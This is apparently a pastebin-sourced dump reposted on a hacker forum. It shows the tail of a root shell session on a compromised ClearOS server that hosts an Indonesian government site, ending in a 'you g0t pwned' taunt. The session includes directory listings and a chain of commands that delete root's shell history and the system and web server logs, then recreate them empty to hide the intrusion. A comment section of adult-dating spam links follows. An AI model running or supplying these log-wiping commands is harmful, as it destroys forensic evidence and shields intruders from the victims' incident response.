1304507870.27573.0 [04/May/2011 18:17:50] root 78075a8e523cd32f02d1478294b05a09 10.10.10.1 apache stop.cgi "stop" "-" "-"
1304507878.27569.0 [04/May/2011 18:17:58] root 78075a8e523cd32f02d1478294b05a09 10.10.10.1 apache start.cgi "start" "-" "-"
sh-3.2# cd /var/www/; ls -la
total 64
drwxr-xr-x 8 root root 4096 May 4 02:48 .
drwxr-xr-x 24 root root 4096 May 9 01:24 ..
drwxr-xr-x 2 root root 4096 Jul 12 2010 cgi-bin
drwxr-xr-x 3 root root 4096 May 4 02:46 error
drwxrwxr-x 20 flexshare allusers 4096 May 13 19:24 html
drwxr-xr-x 3 root root 4096 May 4 18:14 icons
drwxr-xr-x 2 root root 4096 May 4 02:47 mrtg
drwxr-xr-x 4 root root 4096 May 3 16:46 virtual
sh-3.2# cd virtual/; ls -la
total 24
drwxr-xr-x 4 root root 4096 May 3 16:46 .
drwxr-xr-x 8 root root 4096 May 4 02:48 ..
drwxrwxr-x 2 root root 4096 May 4 02:53 infopublik.depkominfo.go.id
drwxrwxr-x 2 root root 4096 May 3 16:46 system.clearos.lan
sh-3.2# cd system.clearos.lan/; ls -la
total 12
drwxrwxr-x 2 root root 4096 May 3 16:46 .
drwxr-xr-x 4 root root 4096 May 3 16:46 ..
sh-3.2# cd /; rm -f ~root/.bash_history; rm -f /var/log/apache2/access.*; rm -f /var/log/apache2/error.*; rm -f /var/log/httpd/access.*; rm -f /var/log/httpd/error.*; rm -f /var/log/netconf.log; rm -f /var/log/boot.log; rm -f /var/log/messages; rm -f /var/log/secure; rm -f /var/log/xferlog; rm -f /var/log/proftpd
sh-3.2# touch ~root/.bash_history; touch /var/log/apache2/access.log; touch /var/log/apache2/error.log; touch /var/log/httpd/access.log; touch /var/log/httpd/error.log; touch /var/log/netconf.log; touch /var/log/boot.log; touch /var/log/messages; touch /var/log/secure; touch /var/log/xferlog; touch /var/log/proftpd
touch: cannot touch `/var/log/apache2/access.log': No such file or directory
touch: cannot touch `/var/log/apache2/error.log': No such file or directory
sh-3.2# chmod 0664 ~root/.bash_history; chmod 0664 /var/log/apache2/access.log; chmod 0664 /var/log/apache2/error.log; chmod 0664 /var/log/httpd/access.log; chmod 0664 /var/log/httpd/error.log; chmod 0664 /var/log/netconf.log; chmod 0664 /var/log/boot.log; chmod 0664 /var/log/messages; chmod 0664 /var/log/secure; chmod 0664 /var/log/xferlog; chmod 0664 /var/log/proftpd
chmod: cannot access `/var/log/apache2/access.log': No such file or directory
chmod: cannot access `/var/log/apache2/error.log': No such file or directory
[~] Last but not least..
Hello professionals IT team, you g0t pwned by Us! Your r00t was breaked by Us!
we would like to disclose your system,password,and all of yours
we rooted your box while you were logged on it, we took everything in a minute
no deleted, nothing rm -rf hope y'all still the best on the public *LOL*
==
Source : http://pastebin.com/raw.php?i=d6cczWNxxxM
Views: 7115 |
Added by: areeff
| Rating: 0.0 /0
Total comments: 7
Comments display order:
By default
New comments first
Old comments first
7 Ashley (03.20.2012 2:09 AM)
0
http://www.datingranks.com/adult-dating/adult-meeter/ , adult meeter , iGgWfRfG
6 Ashley (03.19.2012 10:30 PM)
0
http://www.datingranks.com/adult-dating/adult-meeter/ , adult meeter , cShPlMaY
5 Ashley (03.17.2012 0:41 AM)
0
http://www.datingranks.com/adult-dating/adult-meeter/ , adult meeter , sNfNgGcB
4 Ashley (03.16.2012 9:18 AM)
0
http://www.datingranks.com/adult-dating/adult-meeter/ , adult meeter , iHiBhYgF
3 Ashley (03.14.2012 2:27 PM)
0
http://www.datingranks.com/adult-dating/adult-meeter/ , adult meeter , vEdYdDiR
2 mybbwgf (03.02.2012 2:09 PM)
0
FwIaJyEy http://www.mybbwgf.us/ mybbwgf JrThVaSe
1 my bbw gf.com (02.27.2012 3:45 AM)
0
YuKrGbRf http://mybbwgf my bbw gf.com OsIiDfDa
//hackerz.do.am
